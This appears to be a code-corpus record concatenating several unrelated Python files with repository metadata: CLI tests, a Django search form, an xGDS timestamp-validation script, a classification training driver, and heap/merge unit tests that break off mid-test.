self.mock_create_lm_session.assert_called_once_with('TestEnv', None, 'my/config/file')
def test_get_with_pwd(self):
dl_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
dl_name = 'testdl'
self.lm_sim.add_deployment_location({'id': dl_id, 'name': dl_name, 'resourceManager': 'rm123'})
result = self.runner.invoke(deployment_cmds.list_locations, ['TestEnv', '--pwd', 'secret'])
self.assert_no_errors(result)
expected_output = '| id | name | resourceManager | infrastructureType | description |'
expected_output += '\n|--------------------------------------+--------+-------------------+----------------------+---------------|'
expected_output += '\n| {0} | testdl | rm123 | | |'.format(dl_id)
self.assert_output(result, expected_output)
self.mock_create_lm_session.assert_called_once_with('TestEnv', 'secret', None)
    def test_list_with_output_json_format(self):
        """List with -f json should emit all locations as a pretty-printed JSON items array."""
        dl_A_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
        dl_A_name = 'testdl_a'
        self.lm_sim.add_deployment_location({'id': dl_A_id, 'name': dl_A_name, 'resourceManager': 'rm123'})
        dl_B_id = 'c502bc73-6278-42e0-a5e3-a0fe40674754'
        dl_B_name = 'testdl_b'
        self.lm_sim.add_deployment_location({'id': dl_B_id, 'name': dl_B_name, 'resourceManager': 'rm123'})
        result = self.runner.invoke(deployment_cmds.list_locations, ['TestEnv', '-f', 'json'])
        self.assert_no_errors(result)
        # Expected text mirrors the JSON serializer's indentation exactly; whitespace is significant.
        expected_output = '{'
        expected_output += '\n  \"items\": ['
        expected_output += '\n    {'
        expected_output += '\n      \"id\": \"{0}\",'.format(dl_A_id)
        expected_output += '\n      \"name\": \"{0}\",'.format(dl_A_name)
        expected_output += '\n      \"resourceManager\": \"rm123\"'
        expected_output += '\n    },'
        expected_output += '\n    {'
        expected_output += '\n      \"id\": \"{0}\",'.format(dl_B_id)
        expected_output += '\n      \"name\": \"{0}\",'.format(dl_B_name)
        expected_output += '\n      \"resourceManager\": \"rm123\"'
        expected_output += '\n    }'
        expected_output += '\n  ]'
        expected_output += '\n}'
        self.assert_output(result, expected_output)
        self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
    def test_list_with_output_yaml_format(self):
        """List with -f yaml should emit all locations as a YAML items sequence."""
        dl_A_id = 'f801fa73-6278-42f0-b5d3-a0fe40675327'
        dl_A_name = 'testdl_a'
        self.lm_sim.add_deployment_location({'id': dl_A_id, 'name': dl_A_name, 'resourceManager': 'rm123'})
        dl_B_id = 'c502bc73-6278-42e0-a5e3-a0fe40674754'
        dl_B_name = 'testdl_b'
        self.lm_sim.add_deployment_location({'id': dl_B_id, 'name': dl_B_name, 'resourceManager': 'rm123'})
        result = self.runner.invoke(deployment_cmds.list_locations, ['TestEnv', '-f', 'yaml'])
        self.assert_no_errors(result)
        # YAML sequence layout is significant; the dump ends with a trailing newline.
        expected_output = 'items:'
        expected_output += '\n- id: {0}'.format(dl_A_id)
        expected_output += '\n  name: {0}'.format(dl_A_name)
        expected_output += '\n  resourceManager: rm123'
        expected_output += '\n- id: {0}'.format(dl_B_id)
        expected_output += '\n  name: {0}'.format(dl_B_name)
        expected_output += '\n  resourceManager: rm123\n'
        self.assert_output(result, expected_output)
        self.mock_create_lm_session.assert_called_once_with('TestEnv', None, None)
| 22,031 | 49 | 722 |
9b16e57ad078ac3dd34deccb16011dfd3b9e10f0 | 233 | py | Python | apps/jamendo/forms.py | matagus/django-jamendo | 9004562fdae9d438048c6c11463113337ed874b7 | [
"BSD-3-Clause"
] | 2 | 2015-11-05T11:54:20.000Z | 2016-06-18T05:23:34.000Z | apps/jamendo/forms.py | matagus/django-jamendo | 9004562fdae9d438048c6c11463113337ed874b7 | [
"BSD-3-Clause"
] | null | null | null | apps/jamendo/forms.py | matagus/django-jamendo | 9004562fdae9d438048c6c11463113337ed874b7 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from django import forms
from django.utils.translation import ugettext_lazy as _
| 25.888889 | 69 | 0.733906 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from django import forms
from django.utils.translation import ugettext_lazy as _
class NameSearchForm(forms.Form):
    """Form exposing a single optional field for searching objects by name."""
    # Optional free-text filter; blank submissions are allowed (required=False).
    name = forms.CharField(required=False, label=_("Search by name"))
a156e14fef8865b6948d7cc1e4b5349074a71978 | 17,042 | py | Python | xgds_core/importer/validate_timestamps.py | xgds/xgds_core | 7c2f8d56ca56321f6a9331cda38b40b503fade04 | [
"Apache-2.0"
] | 1 | 2019-02-13T21:02:18.000Z | 2019-02-13T21:02:18.000Z | xgds_core/importer/validate_timestamps.py | xgds/xgds_core | 7c2f8d56ca56321f6a9331cda38b40b503fade04 | [
"Apache-2.0"
] | 2 | 2020-07-16T02:51:17.000Z | 2021-05-06T23:34:15.000Z | xgds_core/importer/validate_timestamps.py | xgds/xgds_core | 7c2f8d56ca56321f6a9331cda38b40b503fade04 | [
"Apache-2.0"
] | 1 | 2017-10-04T18:15:16.000Z | 2017-10-04T18:15:16.000Z | #!/usr/bin/env python
# __BEGIN_LICENSE__
# Copyright (c) 2015, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All rights reserved.
#
# The xGDS platform is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
# __END_LICENSE__
"""
Utilities for validating timestamps in import files
"""
import sys
import yaml
import os
import re
import datetime
import pytz
from PNGinfo import PNGinfo
import PIL.Image
import PIL.ExifTags
from csv import DictReader
from dateutil.parser import parse as dateparser
def get_timestamp_from_filename(filename, time_format, regex=None):
    """
    Returns a utz timezone aware time parsed from the filename given the time format & regex
    :param filename: the actual filename to parse for time
    :param time_format: seconds, microseconds or dateparser
    :param regex: The last pattern matched in the regex should hold the time
    :return: time
    """
    # Some filenames contain float seconds, some int microseconds
    result = None
    if time_format == 'seconds':
        # 10-digit epoch seconds followed by a 4-10 digit fractional part
        timestamp_pattern = '(\d{10}\.\d{4,10})'
        match = re.search(timestamp_pattern, filename)
        if match:
            timestamp_string = match.groups()[-1]
            result = datetime.datetime.utcfromtimestamp(float(timestamp_string)).replace(tzinfo=pytz.UTC)
        else:
            raise ValueError('Could not find expected time string in %s' % filename)
    elif time_format == 'microseconds':
        # 16-digit integer epoch microseconds
        timestamp_pattern = '(\d{16})'
        match = re.search(timestamp_pattern, filename)
        if match:
            timestamp_string = match.groups()[-1]
            result = datetime.datetime.utcfromtimestamp(1e-6 * int(timestamp_string)).replace(tzinfo=pytz.UTC)
        else:
            raise ValueError('Could not find expected time string in %s' % filename)
    elif time_format == 'dateparser':
        if regex:
            timestamp_pattern = regex
            match = re.search(timestamp_pattern, filename)
            if match:
                if regex.count('(') == 2:
                    # Exactly two capture groups: date and time pieces are split, concatenate them
                    timestamp_string = match.group(1) + match.group(2)
                else:
                    timestamp_string = match.groups()[-1]
                zoneless_timestamp = dateparser(timestamp_string)
                result = pytz.utc.localize(zoneless_timestamp)
            else:
                raise ValueError('Could not find expected time string in %s' % filename)
        else:
            raise ValueError('dateparser configuration requires regex: %s' % filename)
    else:
        raise ValueError('invalid type for filename timestamp: %s' % time_format)
    return result
if __name__ == '__main__':
    import optparse
    parser = optparse.OptionParser('usage: %prog [options] <source_root_dir_for_flight>')
    parser.add_option('-c', '--configfile',
                      help='yaml config file for getting timestamps from files')
    parser.add_option('-t', '--test',
                      action='store_true', default=False,
                      help='Run in test mode')
    parser.add_option('-f', '--force',
                      action='store_true', default=False,
                      help='Force creation of a flight even if invalid timestamps are found')
    parser.add_option('-m', '--make_flight',
                      action='store_true', default=False,
                      help='Create a flight for the given directory')
    parser.add_option('-p', '--plot',
                      action='store_true', default=False,
                      help='Plot results to pdf, filename uses the import directory name')
    parser.add_option('-q', '--quiet',
                      action='store_true', default=False,
                      help='Silence most printouts, only include times')
    parser.add_option('-d', '--dirname_pattern', default=None,
                      help='pattern regex for dirname matching')
    opts, args = parser.parse_args()
    if len(args)<1:
        parser.print_help()
        sys.exit(0)
    # Module-level verbosity flag read by the helpers via "if not QUIET".
    # NOTE(review): "global" at module scope is a no-op, but harmless here.
    global QUIET
    QUIET = opts.quiet
    # the top level directory should contain all the data for a flight
    flight_dir = args[0]
    print 'flight_dir: %s' % flight_dir
    # just the final directory name, not the full path to it
    # have to accommodate the path ending in '/' or not
    basename = os.path.basename(os.path.normpath(flight_dir))
    print 'basename: %s' % basename
    # Get start time from root directory
    start_time = None
    if opts.dirname_pattern:
        start_time = get_timestamp_from_dirname(flight_dir, opts.dirname_pattern)
        if start_time is None:
            print 'ERROR: Expected the source root to be in the form %s' % opts.dirname_pattern
            raise ValueError('Cannot get a valid timestamp from source root %s' % flight_dir)
        if not QUIET:
            print 'Flight dir timestamp is %s' % start_time
    # If we were given a timestamp validation config, go validate timestamps for all data
    if opts.configfile is not None:
        validator = TimestampValidator(opts.configfile)
        validator.find_files(flight_dir)
        if not opts.test:
            validator.process_files()
            if not QUIET:
                validator.print_stats()
            timestamps = [t[1] for t in validator.timestamps]
            first_data_time = min(timestamps)
            last_data_time = max(timestamps)
            print 'Timestamps for', basename
            if start_time:
                print 'start time:     ', start_time
            print 'first data time:', first_data_time
            print 'last data time: ', last_data_time
            if start_time:
                for name, timestamp in validator.timestamps:
                    if timestamp < start_time:
                        print 'Error: %s in %s is before start time %s' % (timestamp, name, start_time)
    # If we were asked to create a flight, create it
    # Note that we cannot make a flight with an end time if we didn't get a config
    # NOTE(review): last_data_time is only bound when --test is NOT set; combining
    # --make_flight with --test raises NameError below — confirm intended usage.
    if opts.make_flight:
        try:
            # get or create a flight for that source root directory
            import django
            django.setup()
            from django.conf import settings
            from xgds_core.flightUtils import get_or_create_flight_with_source_root
            dirname = os.path.basename(os.path.normpath(flight_dir))
            suffix = dirname[dirname.find('_'):]
            local_start_time = start_time.astimezone(pytz.timezone(settings.TIME_ZONE))
            name = '%s%s' % (local_start_time.strftime('%Y%m%d'), suffix)
            flight = get_or_create_flight_with_source_root(flight_dir, start_time, last_data_time, name)
            print 'Created or got flight %s' % flight
        except ImportError as e:
            print 'Error: Cannot create a flight'
            print e
    # If we were asked to make a plot, make it
    if opts.plot:
        pdffile = 'timestamps_%s.pdf' % basename
        print 'plotting to', pdffile
        validator.plot_times(pdffile)
| 42.287841 | 121 | 0.597054 | #!/usr/bin/env python
# __BEGIN_LICENSE__
# Copyright (c) 2015, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All rights reserved.
#
# The xGDS platform is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
# __END_LICENSE__
"""
Utilities for validating timestamps in import files
"""
import sys
import yaml
import os
import re
import datetime
import pytz
from PNGinfo import PNGinfo
import PIL.Image
import PIL.ExifTags
from csv import DictReader
from dateutil.parser import parse as dateparser
def get_timestamp_from_filename(filename, time_format, regex=None):
    """
    Returns a utz timezone aware time parsed from the filename given the time format & regex
    :param filename: the actual filename to parse for time
    :param time_format: seconds, microseconds or dateparser
    :param regex: The last pattern matched in the regex should hold the time
    :return: time
    """
    # Some filenames contain float seconds, some int microseconds.
    if time_format == 'seconds':
        # 10-digit epoch seconds followed by a 4-10 digit fractional part.
        found = re.search('(\d{10}\.\d{4,10})', filename)
        if not found:
            raise ValueError('Could not find expected time string in %s' % filename)
        return datetime.datetime.utcfromtimestamp(float(found.groups()[-1])).replace(tzinfo=pytz.UTC)
    if time_format == 'microseconds':
        # 16-digit integer epoch microseconds.
        found = re.search('(\d{16})', filename)
        if not found:
            raise ValueError('Could not find expected time string in %s' % filename)
        return datetime.datetime.utcfromtimestamp(1e-6 * int(found.groups()[-1])).replace(tzinfo=pytz.UTC)
    if time_format == 'dateparser':
        if not regex:
            raise ValueError('dateparser configuration requires regex: %s' % filename)
        found = re.search(regex, filename)
        if not found:
            raise ValueError('Could not find expected time string in %s' % filename)
        if regex.count('(') == 2:
            # Exactly two capture groups: date and time pieces are split, concatenate them.
            raw_timestamp = found.group(1) + found.group(2)
        else:
            raw_timestamp = found.groups()[-1]
        return pytz.utc.localize(dateparser(raw_timestamp))
    raise ValueError('invalid type for filename timestamp: %s' % time_format)
class TimestampValidator:
    """Walks an import directory, matches files against a YAML-driven registry of
    rules, extracts timestamps from the matched files, and reports/plots them."""
    def __init__(self, config_yaml_path):
        """Load the YAML config and initialize file-disposition bookkeeping lists."""
        # config comes from a YAML file
        # NOTE(review): yaml.load without an explicit Loader is unsafe on untrusted input.
        self.config = yaml.load(open(config_yaml_path))
        self.registry = self.config['registry']
        # Local copy of processed files, which are also tracked in the database
        # in order to keep state when the import finder is restarted and for
        # reporting import status to users
        self.processed_files = []
        self.files_to_process = []
        # Keep track of the disposition of all discovered files:
        self.ignored_files = [] # matched an explicit ignore rule
        self.ambiguous_files = [] # matched more than one config rule
        self.unmatched_files = [] # matched no config rule
        self.timestamps_that_failed = [] # tried to import and failed
        self.timestamps_that_succeeded = [] # tried and succeeded
        # The actual timestamps
        self.timestamps = []
    def find_files(self, root_dir):
        """Walk root_dir and bin every file as to-process, ignored, unmatched,
        or ambiguous according to the registry's filepath_pattern rules."""
        for dirName, subdirList, fileList in os.walk(root_dir):
            # print('Found directory: %s' % dirName)
            for basename in fileList:
                filename = os.path.join(dirName, basename)
                # Identify which importer to use, and make sure it's a unique match
                matches = []
                for r in self.registry:
                    #print r['filepath_pattern']
                    match = re.search(r['filepath_pattern'], filename)
                    if match:
                        matches.append(r)
                if 1 == len(matches):
                    if 'ignore' in matches[0] and matches[0]['ignore']:
                        # matched an explicit ignore rule
                        if not QUIET:
                            print 'Ignoring', basename
                        self.ignored_files.append(filename)
                        continue
                    if not QUIET:
                        print 'Adding', basename
                    # unique match, add to the list of things to import
                    self.files_to_process.append((filename, matches[0]))
                elif 0 == len(matches):
                    if not QUIET:
                        print 'Warning: file %s does not match any importer config' % filename
                    self.unmatched_files.append(filename)
                else:
                    if not QUIET:
                        print 'Warning: file %s matches more than one importer config' % filename
                        for m in matches:
                            print m
                    self.ambiguous_files.append(filename)
        if not QUIET:
            print 'Identified files to process:'
            for item in self.files_to_process:
                filename = item[0]
                registry = item[1]
                if not QUIET:
                    print '%s' % (filename)
    def process_files(self, username=None, password=None):
        """Dispatch each discovered file to the extractor named by its rule's 'from' key."""
        for pair in self.files_to_process:
            filename, registry = pair
            if 'from' in registry:
                if registry['from'] == 'filename':
                    self.get_timestamp_from_filename(filename, registry)
                elif registry['from'] == 'csv':
                    self.get_timestamps_from_csv(filename, registry)
                elif registry['from'] == 'exif':
                    self.get_timestamp_from_exif(filename, registry)
                elif registry['from'] == 'doc':
                    self.get_timestamp_from_doc(filename, registry)
                elif registry['from'] == 'text':
                    # TODO IMPLEMENT for example for html parsing
                    pass
                else:
                    raise ValueError('Invalid from argument: %s' % registry['from'])
    def get_timestamp_from_filename(self, full_filename, registry):
        """Parse one timestamp out of the file's basename (module-level helper)
        and record it tagged with the rule name and basename."""
        # Some filenames contain float seconds, some int microseconds
        filename = os.path.basename(full_filename)
        format = registry['format']
        regex = None
        if 'regex' in registry:
            regex = registry['regex']
        timestamp = get_timestamp_from_filename(filename, format, regex)
        self.timestamps.append(('%s: %s' % (registry['name'], filename), timestamp))
    def get_timestamps_from_csv(self, filename, registry):
        """Extract a timestamp from every row of a delimited file, addressing the
        column either by number or by header name, and record each one."""
        delimiter = ','
        if 'delimiter' in registry:
            delimiter_string = registry['delimiter']
            if len(delimiter_string) > 1:
                # Multi-character delimiter spec containing 't' means a tab
                if 't' in delimiter_string:
                    delimiter = '\t'
            else:
                delimiter = delimiter_string
        if 'column_number' in registry:
            # Synthesize numeric field names so DictReader can index by position
            column = '%d' % registry['column_number']
            fieldnames = ['%d' % n for n in range(int(column) + 1)]
            reader = DictReader(open(filename, 'r'), delimiter=delimiter,
                                fieldnames=fieldnames)
        else:
            column = registry['column_name']
            reader = DictReader(open(filename, 'r'), delimiter=delimiter)
        for row in reader:
            timestamp_string = row[column]
            if timestamp_string:
                if registry['format'] == 'seconds':
                    timestamp = datetime.datetime.utcfromtimestamp(float(timestamp_string)).replace(tzinfo=pytz.UTC)
                elif registry['format'] == 'microseconds':
                    timestamp = datetime.datetime.utcfromtimestamp(1e-6 * int(timestamp_string)).replace(tzinfo=pytz.UTC)
                elif registry['format'] == 'iso8601':
                    timestamp = dateparser(timestamp_string)
                    # print 'timezone:', timestamp.tzname()
                else:
                    raise ValueError('Invalid type for csv timestamp: %s' % registry['format'])
                self.timestamps.append((registry['name'], timestamp))
    def get_timestamp_from_exif(self, filename, registry):
        """Read DateTimeOriginal from an image's EXIF tags and record it as UTC."""
        img = PIL.Image.open(filename)
        exif_data = img._getexif()
        # NOTE(review): exif_data is unused and _getexif() is called twice.
        exif = {
            PIL.ExifTags.TAGS[k]: v
            for k, v in img._getexif().items()
            if k in PIL.ExifTags.TAGS
        }
        # Note there is no timezone info standard defined for EXIF,
        # although there is a standard for GPS time in GPSInfo,
        # but our robot is in a cave so none of the cameras will have GPSInfo
        timestamp = dateparser(exif['DateTimeOriginal']).replace(tzinfo=pytz.utc)
        self.timestamps.append((registry['name'], timestamp))
    def get_timestamp_from_doc(self, filename, registry):
        """
        This supports custom metadata in a png image which includes a date with time.
        :param filename: path to the PNG file whose text chunks hold a 'date:' entry
        :param registry: the matched registry rule; its 'name' tags the timestamp
        :return: None; appends (name, timestamp) to self.timestamps
        """
        info = PNGinfo(filename)
        for entry in info.text:
            match = re.search('date:(\D+)([\d\-T\:]+)', entry)
            if match:
                timestamp = dateparser(match.group(2)).astimezone(pytz.utc)
                self.timestamps.append((registry['name'], timestamp))
            else:
                raise ValueError('Cannot parse DOC timestamp')
    def print_stats(self):
        """Print a summary of how discovered files were binned."""
        print 'Found %d files configured to ignore' % len(self.ignored_files)
        print 'Found %d ambiguous files, matched more than one config rule' % len(self.ambiguous_files)
        print 'Found %d unmatched files, matched no config rule' % len(self.unmatched_files)
        if len(self.files_to_process) > 0:
            print 'Found %d files to process' % len(self.files_to_process)
    def plot_times(self,pdffile):
        """Render one horizontal strip of timestamp markers per source name into a PDF."""
        # Convert list of tuples of source name, timestamp to a dictionary of source name key, timestamp list value
        plot_data = {}
        for name,timestamp in self.timestamps:
            if name not in plot_data.keys():
                plot_data[name] = []
            plot_data[name].append(timestamp)
        # decimate big datasets because otherwise the plot is kinda unmanageable
        for k in plot_data.keys():
            if len(plot_data[k])>1000:
                print 'there were', len(plot_data[k]), k
                plot_data[k].sort()
                n = len(plot_data[k])/1000
                newlist = plot_data[k][0::n]
                # just in case we need to see the last one...
                newlist.append(plot_data[k][-1])
                plot_data[k] = newlist
                print 'now there are', len(plot_data[k]), k
        import matplotlib as mpl
        # Select the non-interactive pdf backend before pyplot is imported
        mpl.use('pdf')
        from matplotlib import pyplot as plt
        import matplotlib.dates as mdates
        from matplotlib.dates import DateFormatter
        fig, ax = plt.subplots()
        locs = []
        labels = []
        for idx,name in enumerate(plot_data.keys()):
            locs.append(idx)
            labels.append(name)
            y = [idx]*len(plot_data[name])
            x = plot_data[name]
            plt.plot(x,y,'o')
        plt.yticks(locs,labels)
        # ax.format_xdata = mdates.DateFormatter('%Y.%m.%d %H:%M:%S')
        myFmt = mdates.DateFormatter('%Y.%m.%d %H:%M:%S')
        ax.xaxis.set_major_formatter(myFmt)
        ax.margins(0.05)
        fig.autofmt_xdate()
        fig.tight_layout()
        plt.savefig(pdffile)
def get_timestamp_from_dirname(dirname, pattern):
    """Parse epoch microseconds captured by *pattern* out of *dirname*;
    return a UTC-aware datetime, or None when the pattern does not match."""
    found = re.search(pattern, dirname)
    if found is None:
        return None
    micros = int(found.group(1))
    return datetime.datetime.utcfromtimestamp(1e-6 * micros).replace(tzinfo=pytz.utc)
if __name__ == '__main__':
    import optparse
    parser = optparse.OptionParser('usage: %prog [options] <source_root_dir_for_flight>')
    parser.add_option('-c', '--configfile',
                      help='yaml config file for getting timestamps from files')
    parser.add_option('-t', '--test',
                      action='store_true', default=False,
                      help='Run in test mode')
    parser.add_option('-f', '--force',
                      action='store_true', default=False,
                      help='Force creation of a flight even if invalid timestamps are found')
    parser.add_option('-m', '--make_flight',
                      action='store_true', default=False,
                      help='Create a flight for the given directory')
    parser.add_option('-p', '--plot',
                      action='store_true', default=False,
                      help='Plot results to pdf, filename uses the import directory name')
    parser.add_option('-q', '--quiet',
                      action='store_true', default=False,
                      help='Silence most printouts, only include times')
    parser.add_option('-d', '--dirname_pattern', default=None,
                      help='pattern regex for dirname matching')
    opts, args = parser.parse_args()
    if len(args)<1:
        parser.print_help()
        sys.exit(0)
    # Module-level verbosity flag read by TimestampValidator via "if not QUIET".
    # NOTE(review): "global" at module scope is a no-op, but harmless here.
    global QUIET
    QUIET = opts.quiet
    # the top level directory should contain all the data for a flight
    flight_dir = args[0]
    print 'flight_dir: %s' % flight_dir
    # just the final directory name, not the full path to it
    # have to accommodate the path ending in '/' or not
    basename = os.path.basename(os.path.normpath(flight_dir))
    print 'basename: %s' % basename
    # Get start time from root directory
    start_time = None
    if opts.dirname_pattern:
        start_time = get_timestamp_from_dirname(flight_dir, opts.dirname_pattern)
        if start_time is None:
            print 'ERROR: Expected the source root to be in the form %s' % opts.dirname_pattern
            raise ValueError('Cannot get a valid timestamp from source root %s' % flight_dir)
        if not QUIET:
            print 'Flight dir timestamp is %s' % start_time
    # If we were given a timestamp validation config, go validate timestamps for all data
    if opts.configfile is not None:
        validator = TimestampValidator(opts.configfile)
        validator.find_files(flight_dir)
        if not opts.test:
            validator.process_files()
            if not QUIET:
                validator.print_stats()
            timestamps = [t[1] for t in validator.timestamps]
            first_data_time = min(timestamps)
            last_data_time = max(timestamps)
            print 'Timestamps for', basename
            if start_time:
                print 'start time:     ', start_time
            print 'first data time:', first_data_time
            print 'last data time: ', last_data_time
            if start_time:
                for name, timestamp in validator.timestamps:
                    if timestamp < start_time:
                        print 'Error: %s in %s is before start time %s' % (timestamp, name, start_time)
    # If we were asked to create a flight, create it
    # Note that we cannot make a flight with an end time if we didn't get a config
    # NOTE(review): last_data_time is only bound when --test is NOT set; combining
    # --make_flight with --test raises NameError below — confirm intended usage.
    if opts.make_flight:
        try:
            # get or create a flight for that source root directory
            import django
            django.setup()
            from django.conf import settings
            from xgds_core.flightUtils import get_or_create_flight_with_source_root
            dirname = os.path.basename(os.path.normpath(flight_dir))
            suffix = dirname[dirname.find('_'):]
            local_start_time = start_time.astimezone(pytz.timezone(settings.TIME_ZONE))
            name = '%s%s' % (local_start_time.strftime('%Y%m%d'), suffix)
            flight = get_or_create_flight_with_source_root(flight_dir, start_time, last_data_time, name)
            print 'Created or got flight %s' % flight
        except ImportError as e:
            print 'Error: Cannot create a flight'
            print e
    # If we were asked to make a plot, make it
    if opts.plot:
        pdffile = 'timestamps_%s.pdf' % basename
        print 'plotting to', pdffile
        validator.plot_times(pdffile)
| 8,594 | 812 | 46 |
72bb2c26230187e1a179d511d1cac30530eb8e39 | 1,760 | py | Python | main.py | CarlFredriksson/binary_classification | 727f8b6ae6a10ecc3f522bbdafa14aeb8d73ff9a | [
"MIT"
] | null | null | null | main.py | CarlFredriksson/binary_classification | 727f8b6ae6a10ecc3f522bbdafa14aeb8d73ff9a | [
"MIT"
] | null | null | null | main.py | CarlFredriksson/binary_classification | 727f8b6ae6a10ecc3f522bbdafa14aeb8d73ff9a | [
"MIT"
] | null | null | null | import bc_utils
from logistic_regression import logistic_regression_2D
from nn_classification import nn_binary_classification_2D
LEARNING_RATE = 0.1
NUM_EPOCHS = 20000
bc_utils.create_output_dir()
results_file = open("output/results.txt", "w")
# Linear data
X_train, Y_train = bc_utils.generate_linear_data(300)
bc_utils.plot_data(X_train, Y_train, "data_linear_train.png")
X_test, Y_test = bc_utils.generate_linear_data(300)
bc_utils.plot_data(X_test, Y_test, "data_linear_test.png")
J_train, J_test = logistic_regression_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "lr_db_linear_train.png")
results_file.write("Logistic Regression - linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
J_train, J_test = nn_binary_classification_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "nn_db_linear_train.png")
results_file.write("NN Classification - linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
# Non-linear data
X_train, Y_train = bc_utils.generate_non_linear_data(300)
bc_utils.plot_data(X_train, Y_train, "data_non_linear_train.png")
X_test, Y_test = bc_utils.generate_non_linear_data(300)
bc_utils.plot_data(X_test, Y_test, "data_non_linear_test.png")
J_train, J_test = logistic_regression_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "lr_db_non_linear_train.png")
results_file.write("Logistic Regression - non-linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
J_train, J_test = nn_binary_classification_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "nn_db_non_linear_train.png")
results_file.write("NN Classification - non-linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
| 51.764706 | 136 | 0.779545 | import bc_utils
from logistic_regression import logistic_regression_2D
from nn_classification import nn_binary_classification_2D
LEARNING_RATE = 0.1
NUM_EPOCHS = 20000
bc_utils.create_output_dir()
results_file = open("output/results.txt", "w")
# Linear data
X_train, Y_train = bc_utils.generate_linear_data(300)
bc_utils.plot_data(X_train, Y_train, "data_linear_train.png")
X_test, Y_test = bc_utils.generate_linear_data(300)
bc_utils.plot_data(X_test, Y_test, "data_linear_test.png")
J_train, J_test = logistic_regression_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "lr_db_linear_train.png")
results_file.write("Logistic Regression - linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
J_train, J_test = nn_binary_classification_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "nn_db_linear_train.png")
results_file.write("NN Classification - linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
# Non-linear data
X_train, Y_train = bc_utils.generate_non_linear_data(300)
bc_utils.plot_data(X_train, Y_train, "data_non_linear_train.png")
X_test, Y_test = bc_utils.generate_non_linear_data(300)
bc_utils.plot_data(X_test, Y_test, "data_non_linear_test.png")
J_train, J_test = logistic_regression_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "lr_db_non_linear_train.png")
results_file.write("Logistic Regression - non-linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
J_train, J_test = nn_binary_classification_2D(X_train, Y_train, X_test, Y_test, LEARNING_RATE, NUM_EPOCHS, "nn_db_non_linear_train.png")
results_file.write("NN Classification - non-linear data> J_train: " + str(J_train) + ", J_test: " + str(J_test) + "\n")
| 0 | 0 | 0 |
42f2f8be9ee122bf8c6dba775ad153ac58a369e2 | 1,965 | py | Python | hackathon/column0/test_11_1.py | abdurahmanadilovic/elements-of-programming-interviews | 14d05935aa901f453ea2086e449b670e993a4c83 | [
"MIT"
] | null | null | null | hackathon/column0/test_11_1.py | abdurahmanadilovic/elements-of-programming-interviews | 14d05935aa901f453ea2086e449b670e993a4c83 | [
"MIT"
] | null | null | null | hackathon/column0/test_11_1.py | abdurahmanadilovic/elements-of-programming-interviews | 14d05935aa901f453ea2086e449b670e993a4c83 | [
"MIT"
] | null | null | null | from unittest import TestCase
from .problem_11_1_merge_sorted_files import *
| 25.519481 | 93 | 0.495674 | from unittest import TestCase
from .problem_11_1_merge_sorted_files import *
class TestSolution(TestCase):
    """Tests for problem 11.1 (merge sorted files) and its Node/Heap helpers."""
    def test(self):
        """Merging three short sorted lists yields one sorted list (duplicates kept)."""
        test_case = [
            [3, 5, 7],
            [0, 6, 28],
            [0, 6],
        ]
        self.assertEqual([0, 0, 3, 5, 6, 6, 7, 28], solution(test_case))
    def test2(self):
        """Lists of unequal lengths merge correctly, preserving repeated values."""
        test_case = [
            [3, 5, 7, 9, 20],
            [0, 6, 28, 35],
            [1, 2, 3, 4, 55],
        ]
        self.assertEqual([0, 1, 2, 3, 3, 4, 5, 6, 7, 9, 20, 28, 35, 55], solution(test_case))
    def testHeap(self):
        """Smallest value surfaces first when the root was inserted largest-first."""
        node1 = Node(3)
        node2 = Node(0)
        node3 = Node(1)
        heap = Heap(node1)
        heap.insert(node2)
        heap.insert(node3)
        self.assertEqual(0, heap.take_top())
    def testHeap2(self):
        """Smallest value surfaces first when values arrive in ascending order."""
        node1 = Node(0)
        node2 = Node(1)
        node3 = Node(3)
        heap = Heap(node1)
        heap.insert(node2)
        heap.insert(node3)
        self.assertEqual(0, heap.take_top())
    def testHeap3(self):
        """After a pop, later inserts are still ordered (next top is 1, not 2)."""
        node1 = Node(3)
        node2 = Node(0)
        node3 = Node(1)
        heap = Heap(node1)
        heap.insert(node2)
        heap.insert(node3)
        self.assertEqual(0, heap.take_top())
        node1 = Node(5)
        node2 = Node(6)
        node3 = Node(2)
        heap.insert(node1)
        heap.insert(node2)
        heap.insert(node3)
        self.assertEqual(1, heap.take_top())
    def testHeap4(self):
        """Draining the heap (take_top until None) yields every value ascending."""
        node1 = Node(3)
        node2 = Node(0)
        node3 = Node(1)
        heap = Heap(node1)
        heap.insert(node2)
